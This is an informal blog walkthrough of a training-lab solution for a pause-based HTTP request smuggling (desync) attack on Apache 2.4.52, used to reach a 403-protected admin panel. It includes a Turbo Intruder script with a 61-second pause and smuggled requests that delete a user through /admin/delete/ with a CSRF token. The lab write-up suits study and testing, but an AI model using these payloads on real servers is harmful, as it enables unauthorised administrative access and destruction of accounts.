Pause DeSync Attack :

Pause desync attack: access to 403 forbidden and admin panel

These attack is part of HTTP REQUEST SMUGGLING.

Hey lovely people its KRiPPto99 back again with another blog and today we are going to learn about attack which is part of http request smuggling

Lets Suppose There are two server frontend and backward server whenever we send request it goes through frontend server to backend server whenever backend server Receives the request, it send back response to frontend it complete the cycle, therefore end the connection

In http request what we do is in post request we add get request and try to smuggle and try to fool it, we send half request in backend through frontend we just sent header request and not body request just half request send to backend, backend will wait for request and until time out there always limits in server and after that time being it response to frontend server to complete the connection , now we send another half request using get now it will act as new request and send response to frontend server to complete cycle


Lets give a try in practical check out in this Lab  

In step1: lets quickly login and capture the request send to repeater we can notice there is using Apache 2.4.52 version is vulnerable to pause-based CL.O attack on endpoints that trigger server-level redirects

step2: we will add /resources/  here are notice its redirecting to /resources/

step3:  Now right click the request and select extentions > turbo intruder > send to turbo intruder (we you have not able to see this means you need to install )

step4: Now in turbo intruder change request to a post request (right-click and select Change request method).

step5: Now we need remove extras and change the connection header to keep-alive and add


GET /admin/ HTTP/1.1 

Host: your lab-id 

as below in picture    

and this code


def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=500, pipeline=False ) engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000) engine.queue(target.req) def handleResponse(req, interesting): table.add(req)




step6: shoot on attack and wait for 61 sec as we set on  now look The first entry is the POST /resources request, which triggered a redirect to /resources/


step7: we just need to change host to localhost for admin panel and launch the attack and wait for 61 sec


step8: here we go we just need to check  for CSRF token


step9: halt the reconfigure and do changes like this below


POST /resources HTTP/1.1 Host: Cookie: session=YOUR-SESSION-COOKIE Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: CORRECT POST /admin/delete/ HTTP/1.1 Host: localhost Content-Type: x-www-form-urlencoded Content-Length: CORRECT csrf=YOUR-CSRF-TOKEN&username=carlos

add your CSRF token


step10: attack!!!!!!! and wait for 61 sec and congrats lab is solved…




seeyaa at next time byeee!!!!!!!!!!